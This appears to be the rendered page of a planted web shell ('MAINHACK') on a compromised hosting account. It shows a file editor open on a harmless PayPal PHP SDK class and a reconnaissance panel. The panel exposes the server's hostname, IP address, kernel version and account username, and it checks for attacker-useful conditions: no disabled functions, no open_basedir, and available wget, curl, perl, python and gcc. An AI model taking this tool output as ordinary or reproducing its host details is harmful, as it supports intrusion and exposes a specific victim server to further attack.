[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: CreditCardHistory.php
<?php namespace PayPal\Api; use PayPal\Common\PayPalModel; /** * Class CreditCardHistory * * A list of Credit Card Resources * * @package PayPal\Api * * @property \PayPal\Api\CreditCard[] credit_cards * @property int count * @property string next_id */ class CreditCardHistory extends PayPalModel { /** * A list of credit card resources * * * @param \PayPal\Api\CreditCard[] $credit_cards * @return $this */ public function setCreditCards($credit_cards) { $this->{"credit-cards"} = $credit_cards; return $this; } /** * A list of credit card resources * * @return \PayPal\Api\CreditCard */ public function getCreditCards() { return $this->{"credit-cards"}; } /** * Number of items returned in each range of results. Note that the last results range could have fewer items than the requested number of items. * * * @param int $count * * @return $this */ public function setCount($count) { $this->count = $count; return $this; } /** * Number of items returned in each range of results. Note that the last results range could have fewer items than the requested number of items. * * @return int */ public function getCount() { return $this->count; } /** * Identifier of the next element to get the next range of results. * * * @param string $next_id * * @return $this */ public function setNextId($next_id) { $this->next_id = $next_id; return $this; } /** * Identifier of the next element to get the next range of results. * * @return string */ public function getNextId() { return $this->next_id; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285